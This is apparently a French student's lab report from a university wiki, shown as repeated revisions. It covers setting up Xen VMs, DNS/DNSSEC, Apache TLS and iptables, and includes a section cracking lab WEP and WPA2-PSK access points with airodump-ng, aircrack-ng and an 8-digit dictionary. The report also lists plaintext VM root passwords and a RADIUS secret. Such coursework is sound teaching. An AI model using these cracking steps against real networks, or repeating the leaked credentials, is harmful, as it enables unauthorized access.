dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
</syntaxhighlight><br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code><br />
<br />
<br />
Et ensuite sur le routeur :<syntaxhighlight lang="shell"><br />
conf t<br />
<br />
ip dhcp pool PoolCedric<br />
network 10.60.5.0 255.255.255.0<br />
dns-server 193.48.57.166<br />
default-router 10.60.5.254<br />
exit<br />
<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Vlan15<br />
description "VLAN personnel de Cedric PAYET (E5) - WPA2-EAP"<br />
ip address 10.60.5.2 255.255.255.0<br />
ipv6 address 2001:660:4401:60a5::2/64<br />
vrrp 15 address-family ipv4<br />
priority 110<br />
address 10.60.5.1 primary<br />
exit-vrrp<br />
end<br />
<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12182
Atelier SysRes SE4 2025/2026 E5
2026-02-10T15:59:16Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
